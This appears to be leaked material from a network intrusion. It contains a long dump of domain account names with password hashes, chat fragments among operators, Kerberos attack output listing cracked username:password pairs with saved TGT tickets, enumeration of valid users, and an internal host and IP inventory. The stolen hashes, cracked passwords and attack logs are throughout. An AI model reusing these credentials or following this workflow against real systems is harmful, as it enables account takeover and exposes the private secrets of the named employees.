5751 TeddyLee 8b5ef5b285944b140367c759a70b12b5 66050
3833 JPAntonio 3eda63fd4bf28ba37b061fff4f3ea25b 66050
5768 MichelleHughes 7a353222568c31750ddf263dcb60717f 66050
5801 EuniceSung 0771d3292bdb8226956709118b758f2e 66048
5844 BrittanyLee 0ebffbba2bfe6fc460bf1cd574a4f44f 66048
5635 hqmac020$ 2c62f2e09f34d1c08952df71c50ae552 4096
5693 hqmac024$ 3a6e6e39d531690a3f119c75c552968a 4096
5917 HyeMinLee 7b6fe95a8f84ed4cf4d32ad70fbb4587 66048
5854 HollyHong c61d6b3f77c2b4855812fcd8630ef5fd 66048
3653 YoungPark 6e0e7aa9c00527b0fa1bbd6d0cd98fd0 66048
6194 HQ310$ a71e5bdfaf4a80d93bdd3386a022de3e 4096
5834 KPNWH008$ a5d299ff2966dc2d5a0d56a0bb2c383d 4096
5726 HQ264$ 9d7dd5edd4a8efeb03c2e23aad43b63a 4096
6150 HQ269$ 656216e0054218e902a474bd7155e285 4096
4174 HQ127$ 03a49b6dccbc1dd7ebbc700839c99e9eb 4096
5905 KaylaShin 4ded1802b3eb1aa7a4b9a6377fc321b5 66048
3763 EstherPark 4e007b54f6c36065e3201ecbe986209e 66050
5836 KPNWH022$ 050351e2cb1c757ee2656de8a9429628 4096
3740 YahneseGriffin ec3f0f20a6578b3baeffac643e00887d 66048
5902 BrittanyB fcbced07ee40a75906c5094bbd415df3 66048
5770 StephanieRamos c48ae90c892a82790b9ba984cfc9f42cb 66048
5843 hqmac052$ 597409290b7cdf031a0959eb6c7047b5 4096
5835 KPNWH016$ 99bcedb53bba0948956aa3c15fbf5854 4096
6192 kpnmac011$ e9aee4bd19cac93d723d107c2491c1c8 4096
5890 GanieHwang 90d282fdbd1ffb7c7ba07e48a967cee4 66048
5668 BrayanSerafin 49ebbb91c81babc7089316a0bfd81133 66048
4228 HQ196$ 3b0acb49688c0d4c19b9e55a1328534c 4096
5775 HQ304$ 132f8612e7c095e040596956e01e4855 4096
6178 HQT012$ 084dfdfc51e8403d969b68ab2972b983 4096
5829 KPNSR002$ ca8cbe530b218315e155ff8e76d4c6f3 4096
3904 HQ203$ 7a88c957bc45cbccfb354bcdd1450aae 4096
3655 LillyKim 423b5d1ef30cd08e4ba545c79adc9323 66048
3927 hqmac014$ e1a5e73161369fec7e5e1408bf295803 4096
5869 ChloeLee 8637cea980695ea8d5c8ac3f5e1da29d 66048
6127 HQT005$ 58a459f3f55527d0532245998d1a9652 4096
3764 JanetteFlores 1af2e1956d0c6405d27912e7d8def701 66048
5907 JinYoungKim ba3dfb7e94110778ee0dccc2546423af 66048
5875 AliciaHwang 48bb75a2109064b5f558eedbef042f1a 66048
6171 HQ294$ f1318b15a580a08df95b7bb4fde038c3 4096
3832 HQ158$ 5967271268cbedf66eb4cacf7ed527f9 4096
5742 MarbelSerafin ab12067db2517fb01b3c9fbe1421b6b7 66048
3801 JillianHong 02f266f0a3a3d362391a4c441e129b89 66048
3824 HQ151$ 64d5675d0c401c336cc013ecf13c8551 4096
1778 wh 82ea11ee5c73ebdc9bb4fde2b12df244 66048
6205 HQ315$ 3254d8470d844fa5eec4aedce35d4623 4096
5926 BrittanyLovell 6e30ee1c49ceb27edcf853499f50b25e 66048
5947 LeslyPlancarte 35332e7fb780cf30fbfc29cba93d7bf2 66048
4160 HQ109$ fdb7ca77f3106f6fdb55b4abcb47ea39 4096
4204 HQ164$ 61dffd7bef7d4844eefc6725dff50e40 4096
4176 HQ133$ 61b501c8e80442e73ff80b99721a0e58 4096
1178 TonyPak 1c3241f96515b83f74e7a277ea956532 66048
5915 JenniferChoi 68fee161b32334b8c4d69501cf8a5414 66048
5920 AhramRyu 490cf9ded21774c424116348f2215916 66048
1258 PaulOh 788b3648d74e26a7d0957ab9090f6f9a 66048
5739 GloriaHernandez ad6519dd6264b8cd233b9170956bde84 66048
5696 HQ245$ ae21c627f742c13bf010646370741592 4096
6223 hqmac066$ 3d7da7ac657a23f41d99624738978568 4096
5925 HyePark 7581ef7f434a6e75db6c7d5ec13b240c 66048
5934 AshleyChoi 678756df085a482b6dc37d3d1716cc6e 66048
1220 TimKim e0583b06baa1f40f58b6cd0c858b304b 66048
5725 SofiaSuk 8095fdaff069e7529f5d151a3304feaa 66048
5893 JulyPark 732318e15172095f7ff6fd71e2b42465 66048
5910 AriaChoe 28d670b0d2f5778c72056689f0722396 66048
5945 hqmac064$ a25e890b4d676a2631de0966235656dd 4096
5924 YoungSeo 7211ae4e73a2ebadb6abf53342cc5d10 66048
6176 HQ301$ 9acda185c7366c9f778d3be298ea601f 4096
5719 HQ261$ 98fccfa82c308baeddee8ab56c5c6b3b 4096
6199 HQ314$ 232218af45baec7a05f04c7013dbe02b 4096
5718 DarleneYoung 90ef8ad2330b735b0ee2d679fd409fc9 66048
5918 RosePark 54ceac79513faf8b8c49c255eebfca2e 66048
5747 hqmac042$ fa801a973cd68e1465340e35d1183d18 4096
5860 HanLee 6787dc7c99c6ff77e17a29e1ae5df15b 66048
6156 hqmac040$ e8e76e4080c49b5be3284377ceb0f776 4096
5964 HannahChoi 1df148b29b41024c47fe7a579eba36eb 66048
6196 hqmac054$ 8e78768d957fd8332ba37dafc4a028b9 4096
6157 HQ274$ a194161c5d36454ae0c65d44ba450ed9 4096
5632 hqmac013$ 8871078b7ad26ab2687db783e45ad7a1 4096
5620 hqmac007$ 36e96c68976f9fe8f0f5400f7d4153fd 4096
5931 ChloeSLee 45735e1130c3ffbb7a93eb4bfa9da31c 66048
3881 LoisLee eecd7b8fcc873bcaab511637c6744ac5 66048
3922 hqmac009$ 5a635d3a51aa761dca80f74be571e637 4096
3879 SaralynLoeur 35534e1a493d11d2f0cfc96bd4fb2e6d 66048
5745 HQ278$ abd7bfd0e512f1ff76eeda3af0c06920 4096
5944 RobinBae 4691a2c87c12edcd0d1bbf90964c8e66 66048
5858 HQ324$ 61cf9d70faeb9653ebaffecfc5277f04 4096
3686 AndyCha 115f4ef32315d242abe6351fff681ec8 66048
1226 TomJeon e4aded47f1af2a92a3807e7bf70dcf74 66048
3749 HQ033$ 81701208a469a697c90810f8cb9e2c90 4096
5762 AmandaSun cba0e67baeba56702b742b82d358c9d1 66048
6143 hqmac035$ 04a761dbb7e893fd334a5e9f651681a0 4096
5865 YadiraEspinosa f537f1445562dd8587d1c8b69409871c 66048
5974 HildaMorales 468138ec7d092db58d3a8529ee9f2d4b 66050
5921 IrenePark 3cf52cdea9a036efa0b642da4c19c950 66048
3615 MEGACOM a103a33e9e358a8e5eddc67a7c00e31e 66048
6165 HQ284$ ef69274644c4fde88694bc5e5b279696 4096
7110 HQ323$ 16f8e1f6d49c463e5e2e4ee1e35d2505 4096
6180 hqmac044$ 6bfb6396b0b845c6efa24f29e1f2ec21 4096
1153 EuniceLee 09126272831b72ba18d67f00b033a090 66048
5690 HQ242$ d4a2a3892784c304582d3bba4b199de6 4096
3928 hqmac017$ dc537791ddc56ad815cfba5b0b2baedb 4096
7111 HQ321$ ba72ab25f2f40496792a204e09de8da8 4096
5853 hqmac053$ e5f5111ff177574f743a5de6960bbea1 4096
6204 HQBARTENDER$ e048208bd591b3dc6816fed497e9ba64 4096
4195 HQ153$ c16c76a28fa0e484ba164a2cb85780e7 4096
4255 hqmac018$ 78c159e8016cb592a18e4b0c4f176b61 4096
5657 BrendaPerez dc769f15e6c1c5cdb3974278d29a6d6b 66048
5966 JaniceAhn e8003cea07e597b8f3f125fa1b41ef78 66048
5980 ChristinaPaik aa5d8328edf37916fba36fdce62fe2b5 66048
5936 KPNWH019-THO$ 7c56d2e9353d443d56afb459eca32cf4 4096
3646 ThomasChang f5fecc2c183cea4c2a6537af2b3dd5c6 66048
5975 XiomaraMartinez 4ead53958976d4983b676f4fb4386286 66048
4179 HQ136$ f0d00d4b3e67139441acdf98b4ac2348 4096
5968 TiffanyChoi f702fc7ed5dc3318366c3ff250efc797 66048
5837 kpnmac015$ 06e2815239f004ffa6c0c36736469de2 4096
6158 hqmac039$ 9618175177e6e6c08b03cd001521fd26 4096
4194 HQ148$ 2d55fbb28a582b77f3e49cf5e22a8972 4096
5842 KPNWH018$ 40e7ede02068c0c58d4898115bd81fa3 4096
5671 HQ235$ 7a11d9ed2b22f7ea11d6ccc0f2890a8d 4096
5943 MarieFabon c8bc2265426005ab7556a7bd85afea6d 66048
5669 HQ233$ 91892b5fd58897c1a686e1cd002c9238 4096
2112 HQ034$ 04c669c95c000c1361ee7b8f46b27e04 4096
5716 hqmac031$ a80bc5e01342a7487539f8e10940e842 4096
4239 HQ215$ cee70e744f18fd733844d8f83a9919ee 4096
6159 HQ275$ c0618f4f8cac792ac79f353423cd7db7 4096
5857 SHIPWORKS$ 8c1cde679f4219aafbffa1f99d0131a6 4096
4211 HQ177$ b05468a7a9daae868ebbda2c8590c622 4096
3768 HQ019$ 1e562edeae94f17e083f3c03f9587653 4096
5650 HQ228$ db27412310dae67c002a4aa88d45bec 4096
5758 HQ290$ 85ea06b1182f76be7ce5b96ea7f2b71f 4096
5885 MijiLee 8ac9585bea45991dc0ddc22fad131b67 66048
5852 MattShouse 0a1541b4648611c94f16712ce5e8a573 66048
6177 HQ302$ d9d6a328015f7f96ea3845aaef3f8052 4096
3897 HQ198$ f6e3cd706e32f7029f8ec3dd9f6a3678 4096
5933 missme$ 48ebc8b5e8dc978acffc0749e446437b 4096
5727 HQ265$ 07392311ff58205222e706dea27ba1b3 4096
5710 HQ257$ ceeac64261add7bb7e586805059a9f8c 4096
5828 KPNSR001$ df95d1dac933081941e9ccc5cadbc80f 4096
6186 KPNWH004$ d207e08d77344910ba45287ef7ea4660 4096
6134 HQ251$ f7d734e68493a49e1b51b465419a3b70 4096
3871 HQ181$ 6e3f9cc77d47e3f36f7207ead5bb89ec 4096
5782 HQ307$ 79f98fe4b328a13d32fe3c7b6762463f 4096
6120 HQ237$ 3334476f9723547be8246620fa2af30 4096
4249 hqmac005$ 694df55b012b70483e5f6aa4dd9dc055 4096
5757 HQ289$ 3d485df280e8afd4e07ce1905eccb927 4096
5979 hqmac072$ f12d0778a9d35f0c33a64f986b87b7c3 4096
4237 HQ210$ d051f928f646096b28a67df13c64ab50 4096
5889 JennySong f1eaf3801fb8d9a15c4fc93662711b22 66048
5967 HelenLee dec52846e9de22502810496416082e3c 66048
6137 HQ255$ 7e586c0b00b5bdccb6a0b022f84f0c32 4096
5987 HQ333$ e6f642d7ce10d539ef755f6d2f1a3ae8 4096
6162 HQ280$ bb61e601d0fe8ee8daa7588b355748a7 4096
5776 HQ305$ 8fe6178495cfb1f7e826c0f79abbe952 4096
4175 HQ131$ fd313cc9854784602017aa880cdfd97b 4096
6141 HQT007$ f461a726da4ba1a1e2ca267c889458a40 4096
6129 HQT004$ 5b41bcfc89e10d705b85f189aee9d249 4096
5682 HQT001$ f56c2969382ff9d2f15da32eab0610fb 4096
7124 HQT017$ bb502db77d89e3150fb941684bc2d630 4096
6200 HQT013$ d866a8207447ca9c0d5851be5e4fd26c 4096
5951 JiaeByun 392a6704b514051ee5fd925468c123e9 66048
5913 HQ317$ dc1a89ad80d719ec6252a13fd9066a2f 4096
5832 KPNSR005$ beea7ef7848f07b44d38444976d08681 4096
5994 HQ347$ 523f26291f886be54955163254657b56 4096
4190 HQ147$ a89f92de015f0bf9e903d3c6f38a3359 4096
5992 MimiLee a5dea1b541557ea63479fd6db79eb3bf 66048
5932 MeganKwon e8bcbeb2609fb5bc4cee0c320d5d14b2 66048
5977 RebeccaLee 16c4de54df6c370c3ee3ee3c26cab2f44 66048
6233 hqmac076$ 2cbb01b6820e6e33e4346798ff171d80 4096
5996 hqmac077$ 6e98824884610526e327076ced356e3d 4096
5911 IreneChoi fe50752bd5ea22a41a8aca01605e5818 66048
7112 hqmac60$ 37c647663187204ca7f6af033a4ed036 4096
5997 AllyHwang 28e2381b78cd1f750bfd502770aa6d63 66048
5957 YoungSeoYoun cb0f379ff689c2049efea57e82decec3c3 66048
5720 HQ262$ 88d23bb14ce9c662abc465ea5cb6d4bc 4096
5972 MiaLee 4cb72457d7aead4b390e798236ee9f8f 66048
6001 JoanneChang 60a1a91e44c2994c65f5ad08f867f8f9 66048
6002 HQ350$ 1bbbbc4e24fff56a27105eeb85490212 4096
5962 JayLee 47dc939c82aabe6185337b2075f56366 66048
6232 hqmac075$ 9afab07e095b165a85261b197ff375e1 4096
5831 KPNSR004$ 877ef1fdc9bf31e97b583bb73829d890 4096
5956 hqmac067$ cb55a0058fc2d2556ad5efc88cdb150c 4096
5998 JulieJKim 67ef8e3089d79c3cfc56363c0767846e 66050
5999 GiannaHan 764c1b2a51fecdf23656d7b78ac3838d 66050
1888 JoycePichay 7021809fae14591171379c87abe3a09c 66048
4250 hqmac011$ 05b519668e1bd5fdba45fc24cfadfc64 4096
5976 VioletLee 8d6750e6885239a28090f7555d4d7408 66048
6174 HQ297$ 0d4ab0d8287a13f71d8d1385ba5b2470 4096
5978 hqmac069$ 7a138280c7333ac88bf91e9e236f6e34 4096
6206 HQ318$ ebe67d5cb748c77171548325ce41713a 4096
6195 HQ311$ 438ab27716f6839ca1c4001a9d5c615f 4096
5973 JaneHwang 16d2605bfd8fd431b8ad3455a8876487 66048
5960 SolMoon 741782aa3c54acf9dcc035d345029f6b 66048
6151 HQ270$ c1844a03f37131cf2a55f28870d38db9 4096
5986 HQ328$ 7be6270a63cbfd874a61912318bab12d 4096
6169 HQ292$ da21c38e4767c6f2935dfc5c192bb72b 4096
6003 hqmac078$ 8bf9b916299ec7fbc4e9024bf4b74b0e 4096
5993 HQ346$ 9a6aa33c0326b29fc82e9f958235f69e 4096
5850 KatieLee $6fdf732687167ac4eae608f3f019b6ce 66048
5982 AshleyKim f7313c6b794f3e1411428727a8594cab 66048
5961 PatrickCho 065fcddae05a85a09856cef3e3b3ca3f 66048
6203 KPNWH020$ 5c75a458b5b4e4238a9e666bd5876824 4096
5859 TerryAhn 7ee9b86a12cf3605e1d616daeac5315f 66048
7120 hqmac073$ c91809bb9031755c78855f6afd64f5a2 4096
5969 DanaeHudspeth 44e0474ade49166e21cf2884c670fa5b 66048
3898 ChrisLee 5c1760eb00e981c4839d2b023053561b 66048
6148 COMMITCRM1$ 6aa3781e7d9d32e7213a877932790dff 4096
5830 KPNSR003$ 55f32f682cec5880ebc90bdf65024b41 4096
5984 JarymHerrera f87942fecf2a4a41081a2c18a36c6295 66048
6225 HQ326$ 250f987e5f174cf9f29f08f46ff4403d 4096
5774 GeorgeLiu c4d3b3ad003ab161f50c2687007e1146 66048
5963 HQ406$ 479fb7f5c9c21b7f0cd3d2db0e9696e8 4096
3854 HQ166$ 191d99af1939ea6362f545309d1c5ab2 4096
7127 HQ348$ 4342faf39aba45e849f09a9d9d4d269c 4096
5809 SHOWROOM 44764b991113fc2dd4da7beff159de1d 66048
6161 HQ279$ a717786a67bf0b6e1856eff7da9ae9dc 4096
7116 HQ338$ 707cfcbb448aa7c7eb7cfdb12a0dafc 4096
5922 SamanthaJ e1cc6ce0a064332108cae4e3284ba3a1 66048
5912 BrayanAldana 37dce76fa4c57293581e7a41a38a5401 66048
3754 SharonBong 37dce76fa4c57293581e7a41a38a5401 66048
5941 MelissaOlmos 37dce76fa4c57293581e7a41a38a5401 66048
5611 ClaudiaSantos 37dce76fa4c57293581e7a41a38a5401 66048
4238 MariaGonzales 37dce76fa4c57293581e7a41a38a5401 66048
1180 EloisaBelen 37dce76fa4c57293581e7a41a38a5401 66048
7118 hqmac071$ 5e57f6973e3b398ff0d3ef0734123c70 4096
3900 HQ201$ 66e7f9eeee0c0f6c64d841dcec8ba7dd53 4096
5919 HQ320$ bb8d89fd01d7473ba504e7fc55c0cdaa 4096
6224 hqmac068$ 9e2ed9c0efba90650132bc02ca5f94c1 4096
5946 JohnPichay$ f145353b69b79efc28b89f69ab39253b 66048
4212 HQ176$ bbbbaf61aeb9fb72243819676ab0caaa 4096
6226 HQ327$ 9a57f40423ee3add95c3da8ab3dff031 4096
5755 HQ287$ e958e88f563a69cb1991c8034177a1be 4096
5740 AriannaReyes c1c8b7bd9ff6cb0a3c0f23943701c8d4 66048
5753 DavidRomero 27b231b4cce49e80381b8a14bb607f70 66050
3878 AaronAustin ce11ad444873c39a4da68eab8dcfe051 66050
5948 YobannyCarrillo 83b6abbd4397691cf704f1649b65a4ec 66050
5950 ElenaCoronel 6bcf0ea16fcf3c7696f00df673d7845b 66048
5709 HQ256$ 863517aa1ea3c7fbe84ddf474748119a 4096
5654 VerenisseGuerra 2483b43c5931681a70c5e7a3e80da049 66048
5703 HQ249$ a6870af793b6ae9167f277362cb51471 4096
5824 LuisH 94afb219138c226cf0f024b1ad7511af 66048
5928 hqmac063$ deb31687054536e9b57630ac437511f8 4096
3648 TommyPham 88855d786540490e0ae98ce82e2540fb 66048
3647 TomNguyen ed63e8cbbff2a38ee7fdf900ff46c3b1 66048
5811 JiHong 37dce76fa4c57293581e7a41a38a5401 66048
1519 KhiemNguyen 0073dc4646f80cc53db9a45b670efac1 66048
4232 HQ202$ d80bdda8068dbe1122230619211ad84a 4096
5935 KarinnaCarrillo a79b387b3b68697aeb21d2a5b3e72bdf 66048
5990 HQT016$ b5e2e94d55afff5a4da3694fec2ed6dd 4096
3827 JohnSihn $ 223fa401514d210c4f7f478ca52c3af7 66048
6230 HQ340$ 1eee99c3fe36c904f5d9444b8aa4120f 4096
5781 EmmaKang b671b1ebd4d7c6ef0143b181a80014d8 66048
5688 HQT002$ 6e059c547894c88509902255220b569d 4096
5954 JuneLee 83a304ac699aac600415344c1fb86d50 66048
5841 hqmac050$ 620af5e72df8728e8272365f79afc2a0 4096
6130 hqmac028s-mac-p$ 83db12f343401ad62230c75aecd944c6 4096
3645 MikeKang 2c66a6dfc5d1c9ae81d518d6cac94c42 66048
4231 HQ200$ 30ba804494e4c1a6e3ef8957f16484bf 4096
3818 HQ150$ 552735f1c8390d3e0243a82b3d5ef503 4096
6175 HQ300$ ccddf13314a2ea3944fa5fe2d6938344 4096
6179 HQ303$ d8992b6961bf35d9039f6e3557fe097f 4096
4215 HQ182$ fde1ac53a781583e7204d872d1beaf29 4096
5614 HQ214$ 0331682c92919ad8b4d8d3b951847b98 4096
6207 HQ319$ c110a4d1ecec196bf92c2d6ae8f532aa 4096
6155 HQ273$ 50c55261802561c1c4f4e1aaff29a05e 4096
3914 HQ211$ f508c9ec5d35077e250e8d354eff63ae 4096
5952 marketingfs$ 74345d8b0eca80393973efca9cfc5fc0bc 4096
2623 NickKim 37dce76fa4c57293581e7a41a38a38a5401 66048
5995 HQ349$ 486f7b0494f1bfd065afd4d7783db1d 4096
5715 HQ259$ efa396b13862d06846f5ab7947a56f0a 4096
5677 FrontDesk 6b74b0f0e48512d9a79751c09d730561 66048
6170 HQ293$ 22a00f3430f1b7d05e3ba773f66bc9f0 4096
5655 KirstenSchunk 7d456c2ef878d5cb304b7668663e37a0 66048
5870 ServerAdmin2$ 16e192f6c5c6fec6ffecc970778d071c 4096
5871 MediaAdmin2$ 525e28ca7c04babe51c42890a1149e21 4096
3815 Support 5278ba05e0216f75691d352f5b784ede 66048
5991 HQT015$ c9c78e1b28b708cd1b4705a4cddadc1e 4096
3707 AndyKim 7798b8d7a39009e65953bb40c7d56ed9 66048
5892 SunnyHa f4e7caf58243e81e9a7d8d9124cf0207 66048
5937 YejinKoo 1cff0a01b617074ba9bfe3f53441b92e 66048
3907 AndyP 1bb77d3c5f72b908eb3804c07def1618 66048
6184 ServerAdmin$ 5822ac060c4a9bcd6ad7c21aa7e43423 4096
5795 MediaAdmin$ 83ee6c0d61bea61725fb5048f07fb96b 4096
6202 RCRV-FS$ ac29b1a0c484e31e5334f136d24ec0df 4096
5886 LilianaLopez b879b7cb4cbb09c723181b1b759a9499 66048
6222 HANNAH-HP$ 0bf72a7b5db2743686d9ffdb47cd20ee 4096
500 Administrator 525ac36bc21379f88c1e675a9ed17aa4 66048
5827 JenniferLee efa257a651ec633d84d1608ae7331a4d 66048
6217 HQ404$ 6a5d1a357f7010cc2f86bfda767da312 4096
5894 HQ316$ 84b9a36a6c277c44f512ec17f66fb38d 4096
7125 HQT018$ a2898fd77f9fddb5f7df207d7d98c62c 4096
4184 QB-SVR$ fd55b7d1ab285e4d63faceda43a5b733 4096
2103 YongCKim$ 1023c9be3dd03b565ef16dbf0dbdfb9a 66048
6209 HQ601$ a5f33b14626618c4a9835ccf346ef5ed 4096
5971 MiraryHerrera $6443cc2b5980541bb58601a31bb532e3 66048
6190 KPNWH015$ 0d04a07c8a49b9cde7cc0af23355db45 4096
7115 HQ329$ 2e1d0e1addc2612e3b17696b878e0693 4096
3839 CindyLy 241f8b9bed7ae8c896b5dcab7cc05174 66048
3759 HQ125$ 588e8afe2bac19c331f197e56d5186a3 4096
5988 HQ334$ 9261074ba683fe267b98077c139de12e 4096
6227 HQ330$ 5d2c866114bbf66f53e5213e6ea73a7a 4096
1151 PatriciaChoi dc19cc56a7cc71f38fb3470c605d7a97 66048
1748 FSalgado 8dbe6c368310428b2decccd068f4ac2c 66048
3803 ArnoldChoi 1e6915c4c446d5bdc1d074f1a3f7bfe2 66048
3887 HQ190$ bbc74eff78132e3804a9625a5c38e633 4096
6218 hqmac61$ 2774419f529cc5f39623f3e38c079c15 4096
5640 RocioReyes 77f938451cbee5e6adb3523fbe83d209 66048
1208 ElbertPak d0f7e7e0b6502f02c2bfff79056ea8ae 66048
5808 EdwardP 05bcd65ffd75d0a6bac27c211b29fcc3 66048
5812 RayKim 14e04863170204b9ed58f3f68cbe3eeb 66048
6201 HQT014$ 3b220da511f30e7d68e5433b1ae7c411 4096
6164 HQ282$ ab4de9e53a3b16a2bb908ddd1a065bd8 4096
5773 freddysantos b23e3089694f258622f1093c8ef90565 66048
5959 dnm-wh 8c805e63d0e3010b108c6e4762c5eb24 66048
5989 HQ335$ e595d488a08cf7b6559310fff298c20d 4096
6005 JulissaRamirez daa6e3dfb01abc97a09bfb209afa752b 66048
3795 DanaPark e2384df3a18e7f7dea93ae240918d698 66048
5797 ServerAdmin1$ 63678414af4d2be869fba9d3b0c1db77 4096
6185 MediaAdmin1$ 1d1d8f2c2d86caa2290be44f6b7b2dd8 4096
6116 UPS-FEDEX$ 0616cfd90b8b9ce132b24695f19ae2e2 4096
4187 MMSP-SVR$ 87977d3547221bd674d890cd763374c4 4096
6198 HQT011$ 7751e2a9baf15c156b4d17e35df21c33 4096
1242 AndyHuh $2029262f3731bcd3cb3bfdc65cbea656 66048
4173 HQ126$ 2b11a3bb042630eb175e0aa1e0c13c0e 4096
3906 SarahLee f1a4a411a749258a66cb98d2e843b7fd 66048
1184 KellyLee 309d0c06d02c3d1f38950b504ccc6089 66048
6211 HQ602$ 644751b0ed8ce95f3bf6430757a260f4 4096
5110 MM-DC1$ 26553c3f340329abb95592d3e0d7bec51 532480
7114 HQ325$ 18a601f9998fd7e573a97307eaacf919 4096
3859 MM-LIB$ e8e851fc91f5b09550ef3f823af80d38 4096
5764 JayRoberts$ ca0c0e91a43000944c3ec9e62edd251c 66048
6181 HQ306$ 01cc749e8af7e26a90a964f1095c0855 4096
5699 CelineNguyen 287e22b7def56c27f0c53164fdb00722 66048
5642 MM-DC2$ aa4c035cafc5ffb8612d883d7bc73aa3 532480
5759 Thomas f21e58ada2fe53f0457409cbe57f2174 66048
5744 HQ276$ 9eb34226a5813bfe1fdc5b4bd5083378 4096
3872 DianeTran 44dc3f1327d938875f205efc2c23284f 66048
1147 soohkim 41ba0ab5e2ac0824285ff0aac6130910 66048
5949 LauraChung 9b32b16ff20799564c57f1c98dff2524 66048
6197 HQ312$ c688e1ba7b13c7a45175c8469d1f3f89 4096
5663 HQ231$ e8ff86989cebc6358149c93d36c84814 4096
5958 DNM-WH$ 2c37d24237754b06084beaed562c833f 4096
6219 hqmac062$ ba22b48cf144630a1114d16b3050e197 4096
5983 JulieKim 3741a798f458dfc2d5b234fb42ff9173 66048
6210 HQ402$ e6dc4e1105c293f0896a51d629c0f1c1 4096
5783 KPN-FS$ 0a9945a61b5b99777846bfb315f4df32 4096
6183 MM-FS$ 89f8238b56f40b93e7b5fa4154ed5cac 4096
6216 HQ401$ 1745af25bb9f82a9470529f441506c9c 4096
6004 HQ352$ 6910db81331ea71fa15557aedf6d74ac 4096
5796 MCPC$ 5c532af7d098fe037268049e5d8c59f3 4096
1164 YounHKim 8b8ebb0eb3bbd00d544848638fb020eb 66048
5938 MM-DC3$ 4c515e93ca1e690a62d44a7998b54047 532480
7123 HQ343$ a7ef6ce0235047e7d268cd9102fc2529 4096
4244 JoanPark 7aa43a27415ccb9d76590690f51a1719 66048
5848 HQ308$ 78fdb7fe0d8b3cd7b780388a5db6e217 4096
6228 HQ331$ 36b12b8caf4005fa05281b5b16b4592c 4096
6229 H332$ 77bbe127fc5ed6d8789da8a323acbd4e 4096
7117 HQ337$ 3c52a7027ca5d3624fa229af953407c8 4096
6221 HQ405$ 9d4659bd94a56c84573fe8479ccdc4c7 4096
4251 HQ217$ 96243fb134b7e226293c82fbc161c1e0 4096
3641 MichaelLee 970e74a2676eeb2266923f7576ae117b 66048
5615 ErnestoMoreno e04273f3b5746cb1b3326dbfbca86ac2 66048
6234 HQ351$ 4f553e073e189afe720166707df130b7 4096
5667 brandonsantana ccccda3163fd1105e0ab85885e4750b3 66048
2377 ClaudiaM 15e69ae664ccbeb4c4e6ee737e32ec6e 66048
3616 JulieKang 57e030c6654985cda6706bca1d1875e3 66048
6118 HQ232$ c20f2ce2eb7ab572797ef2dab3e9e9b3 4096
7122 HQ342$ 8639910bc25999db8dbd830090a759ed 4096
7121 HQ341$ d490e89f419113f1a358f46718c8fcb5 4096
6220 HQ603$ ab000455c06b8c84c9ecd3ce2d673d4a 4096
5883 photostudio$ d6bf74d6249997a2da21e22a5f7713c5 4096
6167 HQ288$ a0591cead4829dfb7e9f2ac528329992 4096
6142 HQ266$ 94068730c46037dbfff0cfc464177896 4096
3698 ChristineCha b0b21cf400db4e1eb1e37f39bab659f9 66048
5767 HQ299$ d6e3060e2eb0d0ef6f34eb5132626977 4096
5766 HQ298$ 2d65d2bd6109067bb5397ccbedc2624d 4096
6231 HQ345$ 7e27942b86419b84b48e11d3f7727fbf 4096
7119 HQ339$ 9de3abad1d08b6dbb22bf7208e240454 4096
2250 LisaKim 5fe115116139af2f9c8997f052c924ed 66048
7126 hqmac074$ 25e5db2f84c3fa0e020cbd420cb3a7a9 4096
1143 StellaCho f2f1bb29e892c1bcc50dca5862740cd8 66048
7113 hqmac070$ 65b79d127724f7796a96167f256d285b 4096
5965 NatalieSanchez a5d4f7118b63436c727bd6f7b4093a40 66048
1241 JenniferSuk 8497dc374396f9197798df4997a106d1 66048
2551 LeahKoh 1490979b7d44da96cac220bd273cb924 66048
6173 HQ296$ 9b8edb20af349aefe879ebd4908d4e78 4096
5927 HQ403$ f336f7408f1b0c270896e4303e020578 4096
5805 KellyCho a247481db51c56b3f7933dfa00d048dc 66048
``No session?
for now yes, @tl1 will now see what can be run while@tl1 @tl2 We have all sessions down - help the second team? ``
[+] received output:
[+] STUPENDOUS => wendy:0204
[*] Saved TGT into wendy.kirbi

[+] received output:
[+] STUPENDOUS => tele:0484
[*] Saved TGT into tele.kirbi

[+] received output:
[+] STUPENDOUS => jen:1225
[*] Saved TGT into jen.kirbi

[+] received output:
[+] STUPENDOUS => FL1:1602
[*] Saved TGT into FL1.kirbi
[+] STUPENDOUS => FL2:1602
[*] Saved TGT into FL2.kirbi

[+] received output:
[+] STUPENDOUS => jody:3346
[*] Saved TGT into jody.kirbi

[+] received output:
[+] STUPENDOUS => Ted:4194
[*] Saved TGT into Ted.kirbi

[+] received output:
[+] STUPENDOUS => tony:4321
[*] Saved TGT into tony.kirbi

[+] received output:
[+] STUPENDOUS => rmg:4372
[*] Saved TGT into rmg.kirbi
``user9 gave out @user1 @user3 dedicates, still separately give out something useful or not ?
https://gist.github.com/HarmJ0y/dc379107cfb4aa7ef5c3ecbac0133a02эхххх, none of the passwords worked (
  ```
 ______ _
  (_____ \ | |
   _____) )_ _| |__ _____ _ _ ___
  | __ /| | | | _ \| ___ | | | |/___)
  | | \ \| |_| | |_) ) ____| |_| |___ |
  |_| |_|____/|____/|_____)____/(___/

  v1.5.0

[+] Valid user => Administrator
[+] Valid user => telemkt
[+] Valid user => jen
[+] Valid user => barb
[+] Valid user => jody
[+] Valid user => wendy
[+] Valid user => jon
[+] Valid user => louis
[+] Valid user => frontdesk
[+] Valid user => linux
[+] Valid user => micro
[+] Valid user => tele
[+] Valid user => micro2
[+] Valid user => Spare

[+] received output:
[+] Valid user => Gretta
[+] Valid user => FL1
[+] Valid user => PAC
[+] Valid user => mtsi
[+] Valid user => Ted
[+] Valid user => srivera
[+] Valid user => mhorgan
[+] Valid user => rmg
[+] Valid user => zztest
[+] Valid user => louisold
[+] Valid user => tony
[+] Valid user => FL2
[-] Blocked/Disabled user => Guest
[-] Blocked/Disabled user => krbtgt

[-] Done: No credentials were discovered :'(

``````

 Server Name IP Address
 ----------- ----------
 2K12SERVER 192.168.168.10
 PPCCOMP 192.168.168.50
 SUE-PC 192.168.168.68
 COMPUTER-1 192.168.168.62
 TELEMARKET 192.168.168.62
 JODY-PC 192.168.168.56
 WENDY-PC 192.168.168.55
 JONM-PC 192.168.168.50
 DAN-HP 192.168.168.67
 FRONTDESK 192.168.168.54
 PKG-102 192.168.168.63
 PKG-100 192.168.168.240
 PKG-101 192.168.168.70
 TONY-PC 192.168.168.51

[+] received output:
 TELEMARKETING-H unknown
 TIMECLOCKSQL 192.168.168.15
 HP-TONY 172.16.200.1
 BARBARA-HP-2019 192.168.168.66
 SALES2-HP-2019 192.168.168.53
 SALES1-HP-2019 192.168.168.73
 TED-LAPTOP 192.168.168.71

